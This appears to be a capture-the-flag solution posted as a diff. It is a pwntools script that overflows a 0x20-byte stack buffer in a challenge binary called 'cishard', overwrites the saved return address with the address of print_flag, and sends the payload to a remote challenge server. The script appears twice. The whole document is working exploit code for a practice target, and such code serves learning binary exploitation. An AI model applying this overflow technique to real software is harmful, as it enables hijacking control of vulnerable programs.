xmpf · March 20, 2021 20:06
diff --git a/cishard.py b/cishard.py
 #!/usr/bin/env python3

 from pwn import *

 '''
 gdb> info functions
 0x00000000004011b6  print_flag
 '''
 addr = p64(0x4011b6)

 payload = b""

 '''
    0x0000000000401222 <+8>:     sub    rsp,0x20
    0x0000000000401226 <+12>:    lea    rax,[rbp-0x20]
 '''
 payload += b"A" * 0x20

 '''
 Overwrite RBP
 '''
 payload += b"B" * 0x8

 '''
 Overwrite RIP
 '''
 payload += addr

 r = remote("chall.codefest.tech", 8780)
 r.recvline()

 r.sendline(payload)
 data = r.recvline()
 print(data.decode())
	#!/usr/bin/env python3

	from pwn import *

	'''
	gdb> info functions
	0x00000000004011b6 print_flag
	'''
	addr = p64(0x4011b6)

	payload = b""

	'''
	0x0000000000401222 <+8>: sub rsp,0x20
	0x0000000000401226 <+12>: lea rax,[rbp-0x20]
	'''
	payload += b"A" * 0x20

	'''
	Overwrite RBP
	'''
	payload += b"B" * 0x8

	'''
	Overwrite RIP
	'''
	payload += addr

	r = remote("chall.codefest.tech", 8780)
	r.recvline()

	r.sendline(payload)
	data = r.recvline()
	print(data.decode())